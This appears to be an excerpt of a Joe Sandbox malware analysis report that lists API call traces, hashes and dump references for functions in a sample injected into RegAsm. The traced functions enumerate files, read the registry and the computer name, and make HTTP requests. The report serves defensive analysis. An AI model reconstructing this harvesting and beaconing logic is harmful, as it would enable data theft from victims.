Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: a565577679dd8a0504a1d15f914896fe3659e154cb8e13ffca774fc0674d62c6
Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
Opcode Fuzzy Hash: a565577679dd8a0504a1d15f914896fe3659e154cb8e13ffca774fc0674d62c6
Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5

Function 00414F40 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
lstrcatA.KERNEL32(?,00421070), ref: 00414F97
lstrcatA.KERNEL32(?,0133ACF8), ref: 00414FAB
lstrcatA.KERNEL32(?,00421074), ref: 00414FBD

Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943

Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: fee2ad206d2dfc0e98077b290248d81ad00eb14900011837df4a2dd7ccce19b5
Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
Opcode Fuzzy Hash: fee2ad206d2dfc0e98077b290248d81ad00eb14900011837df4a2dd7ccce19b5
Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96

Function 00417E00 Relevance: 6.1, APIs: 4, Instructions: 58memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
HeapAlloc.KERNEL32(00000000), ref: 00417E3E
RegOpenKeyExA.KERNEL32(80000002,0133C320,00000000,00020119,?), ref: 00417E5E
RegQueryValueExA.KERNEL32(?,01342680,00000000,00000000,000000FF,000000FF), ref: 00417E7F

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6

Function 004012A0 Relevance: 6.0, APIs: 4, Instructions: 39memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
HeapAlloc.KERNEL32(00000000), ref: 004012BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51

Function 00416AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0133AAB8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
CloseHandle.KERNEL32(00000000), ref: 00416AF9
Sleep.KERNEL32(00001770), ref: 00416B04
CloseHandle.KERNEL32(?,00000000,?,0133AAB8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
ExitProcess.KERNEL32 ref: 00416B22

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: aa120b36cfb137c48c1a566cacac99fef06b1c93e7411723dec979bce85ea544
Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
Opcode Fuzzy Hash: aa120b36cfb137c48c1a566cacac99fef06b1c93e7411723dec979bce85ea544
Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F

Function 00406D40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

`o@, xrefs: 00406E5E, 00406DD2, 00406DAE, 00406E94, 00406EAF

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: `o@
API String ID: 0-590292170
Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95

Function 00414BB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
lstrcatA.KERNEL32(?,013422C0), ref: 00414C08

Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943

Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92

Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
Part of subcall function 00414910: lstrcatA.KERNEL32(?,01343978,?,000003E8), ref: 00414A4A
Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96

Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07

Strings

UaA, xrefs: 00414C2F, 00414C64, 00414C9A, 00414CCF, 00414D05, 00414D3A, 00414D5F, 00414C32, 00414C67, 00414C9D, 00414CD2, 00414D08, 00414D3D

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: UaA
API String ID: 153043497-3893042857
Opcode ID: f76eef8fce44aa4967a05993499158b30be10cc84edb5c5c67862afe97780de1
Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
Opcode Fuzzy Hash: f76eef8fce44aa4967a05993499158b30be10cc84edb5c5c67862afe97780de1
Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6

Function 004151F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,013439D8), ref: 00406303
Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,01343140,00000000,00000000,00400100,00000000), ref: 00406385
Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228

Strings

ERROR, xrefs: 00415273
ERROR, xrefs: 0041521A

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 9ad3e3659df19f2be40a08658cda63cc31681db51bdf2003e60922b473f200c1
Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
Opcode Fuzzy Hash: 9ad3e3659df19f2be40a08658cda63cc31681db51bdf2003e60922b473f200c1
Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A

Function 00415050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
lstrcatA.KERNEL32(?,01342E58), ref: 004150A8

Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943

Strings

aA, xrefs: 004150CF, 004150F4, 004150D2

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID: aA
API String ID: 2699682494-2567749500
Opcode ID: d72f4a737726d54df99455f6ce83c9bf159133315d7b4ee64ed3cf280c4408bd
Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
Opcode Fuzzy Hash: d72f4a737726d54df99455f6ce83c9bf159133315d7b4ee64ed3cf280c4408bd
Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6

Function 004178E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6

